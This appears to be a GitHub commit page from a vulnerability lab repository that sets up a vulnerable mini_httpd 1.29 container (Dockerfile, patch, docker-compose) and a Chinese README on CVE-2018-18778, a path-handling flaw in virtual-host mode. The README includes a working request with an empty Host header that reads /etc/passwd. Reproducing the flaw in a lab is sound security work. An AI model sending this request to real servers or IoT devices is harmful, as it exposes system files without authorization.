Skip to content

Commit

Permalink
Merge branch 'mini_httpd-cve-2018-18778'
Browse files Browse the repository at this point in the history
  • Loading branch information
@phith0n
phith0n committed Nov 1, 2018
2 parents dd5b071 + cc0d848 commit 3269c73
Show file tree
Hide file tree
Showing 5 changed files with 88 additions and 0 deletions.
21 changes: 21 additions & 0 deletions base/mini_httpd/1.29/Dockerfile
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,21 @@
FROM buildpack-deps:jessie-curl

ADD debian.patch /debian.patch

RUN set -ex \
&& apt-get update \
&& apt-get install --no-install-recommends -y gcc make libc6-dev patch \
&& wget -qO- http://www.acme.com/software/mini_httpd/mini_httpd-1.29.tar.gz \
| tar zx -C /usr/src --strip-components=1 \
&& cd /usr/src \
&& patch mini_httpd.c < /debian.patch \
&& make \
&& make install \
&& mkdir -p /var/www/html \
&& chown www-data:www-data /var/www/html \
&& rm -rf /usr/src/* /var/lib/apt/lists/* /debian.patch

WORKDIR /var/www/html
EXPOSE 8080

CMD ["mini_httpd", "-p", "8080", "-u", "www-data", "-h", "0.0.0.0", "-d", "/var/www/html", "-D", "-c", "**.cgi", "-l", "/dev/stdout", "-T", "utf-8"]
14 changes: 14 additions & 0 deletions base/mini_httpd/1.29/debian.patch
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,14 @@
--- mini_httpd.c 2018-11-01 13:07:56.856000000 +0000
+++ mini_httpd.patch.c 2018-11-01 13:07:27.148000000 +0000
@@ -98,9 +98,11 @@
#define SIZE_T_MAX 2147483647L
#endif

+/*
#ifndef HAVE_INT64T
typedef long long int64_t;
#endif
+*/

#ifdef __CYGWIN__
#define timezone _timezone
Binary file added mini_httpd/CVE-2018-18778/1.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
46 changes: 46 additions & 0 deletions mini_httpd/CVE-2018-18778/README.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,46 @@
# mini_httpd任意文件读取漏洞(CVE-2018-18778)

Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。

在mini_httpd开启虚拟主机模式的情况下,用户请求`http://HOST/FILE`将会访问到当前目录下的`HOST/FILE`文件。

```c
(void) snprintf( vfile, sizeof(vfile), "%s/%s", req_hostname, f );
```

见上述代码,分析如下:

- 当HOST=`example.com`、FILE=`index.html`的时候,上述语句结果为`example.com/index.html`,文件正常读取。
- 当HOST为空、FILE=`etc/passwd`的时候,上述语句结果为`/etc/passwd`

后者被作为绝对路径,于是读取到了`/etc/passwd`,造成任意文件读取漏洞。

## 环境搭建

执行如下命令启动mini_httpd 1.29:

```
docker-compose up -d
```

环境启动后,访问`http://your-ip:8080`即可看到Web页面。

## 漏洞复现

发送请求是将Host置空,PATH的值是文件绝对路径:

```
GET /etc/passwd HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
```

成功读取文件:

![](1.png)
7 changes: 7 additions & 0 deletions mini_httpd/CVE-2018-18778/docker-compose.yml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,7 @@
version: '2'
services:
web:
image: vulhub/mini_httpd:1.29
command: mini_httpd -p 8080 -u www-data -h 0.0.0.0 -D -l /dev/stdout -v -T utf-8
ports:
- "8080:8080"

0 comments on commit 3269c73

Please sign in to comment.